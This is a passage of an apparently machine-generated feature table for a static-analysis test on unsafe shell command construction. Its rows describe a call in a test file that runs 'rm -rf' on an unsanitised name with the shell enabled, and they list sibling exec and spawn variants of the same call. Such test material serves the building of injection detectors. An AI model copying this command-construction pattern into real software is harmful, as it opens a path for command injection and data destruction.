Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:13 | cp.spawnSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:13 | cp.spawnSync | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:13 | cp.spawnSync | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:13 | cp.spawnSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | exceptional return of cp.spaw ... true}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | exceptional return of cp.spaw ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | exceptional return of cp.spaw ... true}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | exceptional return of cp.spaw ... true}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | exceptional return of cp.spaw ... true}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:5:420:13 | spawnSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:5:420:13 | spawnSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:5:420:13 | spawnSync | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:5:420:13 | spawnSync | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:5:420:13 | spawnSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | CalleeFlexibleAccessPath | cp.spawnSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:15:420:18 | "rm" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | CalleeFlexibleAccessPath | cp.spawnSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:21:420:33 | ["-rf", name] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:22:420:26 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:29:420:32 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | CalleeFlexibleAccessPath | cp.spawnSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:36:420:48 | {shell: true} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:41 | shell | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:41 | shell | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:41 | shell | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:41 | shell | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:41 | shell | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | contextFunctionInterfaces | 